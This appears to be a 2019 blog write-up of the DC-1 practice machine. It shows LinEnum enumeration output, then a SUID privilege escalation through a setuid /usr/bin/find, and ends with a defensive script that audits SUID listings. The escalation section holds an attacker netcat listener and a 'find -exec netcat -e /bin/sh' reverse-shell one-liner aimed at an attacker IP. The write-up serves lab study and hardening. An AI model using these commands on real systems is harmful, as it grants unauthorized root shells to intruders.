1093 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
1094 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
1095 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
1096 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
1097 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
1098 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
1099 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
1100 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
1101 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
1102 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
1103 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
1104 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
1105 
1106 
1107 [-] /etc/init.d/ binary permissions:
1108 total 280
1109 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
1110 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1111 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
1112 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
1113 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
1114 -rw-r--r--  1 root root 2427 Oct 16  2012 README
1115 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
1116 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
1117 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
1118 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
1119 -rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
1120 -rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
1121 -rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
1122 -rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
1123 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
1124 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
1125 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
1126 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
1127 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
1128 -rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
1129 -rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
1130 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
1131 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
1132 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
1133 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
1134 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
1135 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
1136 -rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
1137 -rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
1138 -rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
1139 -rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
1140 -rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
1141 -rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
1142 -rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
1143 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
1144 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
1145 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
1146 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
1147 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
1148 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
1149 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
1150 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
1151 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
1152 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
1153 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
1154 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
1155 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
1156 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
1157 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
1158 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
1159 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
1160 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
1161 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
1162 -rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
1163 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
1164 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
1165 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
1166 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
1167 
1168 
1169 [-] /etc/init/ config file permissions:
1170 total 48
1171 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
1172 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1173 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
1174 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
1175 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
1176 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
1177 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
1178 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
1179 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
1180 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
1181 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
1182 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
1183 
1184 
1185 [-] /lib/systemd/* config file permissions:
1186 /lib/systemd/:
1187 total 4.0K
1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
1189 
1190 /lib/systemd/system:
1191 total 56K
1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
1196 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
1197 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
1198 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
1199 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
1200 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
1201 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
1202 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
1203 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
1204 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
1205 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
1206 
1207 /lib/systemd/system/dbus.target.wants:
1208 total 0
1209 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1210 
1211 /lib/systemd/system/multi-user.target.wants:
1212 total 0
1213 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
1214 
1215 /lib/systemd/system/sockets.target.wants:
1216 total 0
1217 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1218 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
1219 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
1220 
1221 /lib/systemd/system/basic.target.wants:
1222 total 0
1223 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
1224 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
1225 
1226 
1227 ### SOFTWARE #############################################
1228 [-] MYSQL version:
1229 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
1230 
1231 
1232 [-] Apache user configuration:
1233 APACHE_RUN_USER=www-data
1234 APACHE_RUN_GROUP=www-data
1235 
1236 
1237 ### INTERESTING FILES ####################################
1238 [-] Useful file locations:
1239 /bin/nc
1240 /bin/netcat
1241 /usr/bin/wget
1242 /usr/bin/gcc
1243 /usr/bin/curl
1244 
1245 
1246 [-] Installed compilers:
1247 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
1248 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
1249 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
1250 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
1251 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
1252 
1253 
1254 [-] Can we read/write sensitive files:
1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
1257 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
1259 
1260 
1261 [-] SUID files:
1262 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
1263 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
1264 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
1265 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
1266 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
1267 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1268 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
1269 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
1270 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
1271 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
1272 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
1273 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1274 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1275 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
1276 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
1277 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
1278 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1280 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
1281 
1282 
1283 [+] Possibly interesting SUID files:
1284 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1285 
1286 
1287 [-] SGID files:
1288 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
1289 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
1291 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
1292 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
1293 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
1294 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
1295 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
1296 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
1297 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
1298 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1299 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
1300 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
1301 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
1302 
1303 
1304 [-] Can't search *.conf files as no keyword was entered
1305 
1306 [-] Can't search *.php files as no keyword was entered
1307 
1308 [-] Can't search *.log files as no keyword was entered
1309 
1310 [-] Can't search *.ini files as no keyword was entered
1311 
1312 [-] All *.conf files in /etc (recursive 1 level):
1313 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
1314 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
1315 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
1316 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
1317 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
1318 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
1320 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
1321 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
1323 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
1324 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
1325 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
1326 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
1327 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
1328 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
1329 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
1330 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
1331 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
1333 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
1334 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
1336 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
1337 
1338 
1339 [-] Location and contents (if accessible) of .bash_history file(s):
1340 /home/flag4/.bash_history
1341 cd 
1342 ls
1343 vi flag4.txt
1344 ls
1345 exit
1346 
1347 
1348 [-] Any interesting mail in /var/mail:
1349 total 8
1350 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
1352 
1353 
1354 ### SCAN COMPLETE ####################################

A weak point was found (a setuid-root /usr/bin/find); try SUID privilege escalation.

Reference article: https://pentestlab.blog/2017/09/25/suid-executables/

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Reverse shell

Attacker machine

root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

In the meterpreter shell, run the following (suidtest is simply an existing file in the current directory, passed to find as its starting point so that -exec has something to run on):

find suidtest -exec netcat -e /bin/sh 192.168.0.117 8999 \;

Privilege escalation successful.
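From the defender's side, the same SUID listing that LinEnum printed above can be audited automatically. The script below is an added example, not code from the original post or from LinEnum: it parses ls -l style lines and flags setuid entries that should not carry the bit; the RISKY_SUID list and the /opt/backup/helper entry are my own constructed assumptions.

```shell
#!/bin/sh
# Added audit example, not code from the original post. It reads ls -l
# style lines (the format LinEnum prints under "[-] SUID files") and
# flags setuid entries that should not carry the bit. The sample list
# below is constructed from the DC-1 output above plus one invented entry.

# Binaries that can spawn a shell or run arbitrary commands; none of
# them needs setuid on a normally configured host.
RISKY_SUID="find bash sh dash vim vi nano perl python python2 python3 nmap awk less more"

# Constructed sample; /opt/backup/helper is invented for the demo.
SAMPLE_SUID_LIST='-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
-rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
-rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
-rwsrwxr-x 1 root root 1234 May  7  2019 /opt/backup/helper'

# audit_suid: reads ls -l lines on stdin and prints one tab-separated
# line "path<TAB>mode<TAB>reason" for every setuid entry that is either
# root-owned and named in RISKY_SUID, or writable by group/others.
audit_suid() {
    while read -r mode links owner group size mon day yr path; do
        if [ -z "$path" ]; then continue; fi
        case "$mode" in
            ???[sS]*) ;;        # 4th char: setuid bit present
            *) continue ;;
        esac
        name=${path##*/}
        reason=""
        if [ "$owner" = "root" ]; then
            for r in $RISKY_SUID; do
                if [ "$name" = "$r" ]; then
                    reason="root setuid on a shell/exec-capable binary"
                fi
            done
        fi
        case "$mode" in
            ?????w*|????????w*) reason="setuid file writable by group or others" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s\t%s\t%s\n' "$path" "$mode" "$reason"
        fi
    done
    return 0
}

# Stand-alone run; on a live host feed it: find / -perm -4000 -type f -exec ls -l {} + | audit_suid
# Remediation for a hit like /usr/bin/find is simply: chmod u-s /usr/bin/find
printf '%s\n' "$SAMPLE_SUID_LIST" | audit_suid
```

On the DC-1 sample this reports /usr/bin/find and the invented group-writable helper, and stays silent on ping, su and at, matching LinEnum's "Possibly interesting SUID files" verdict.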

posted @ 2019-05-06 23:01  奥利给胖虎  reads (752)  comments (0)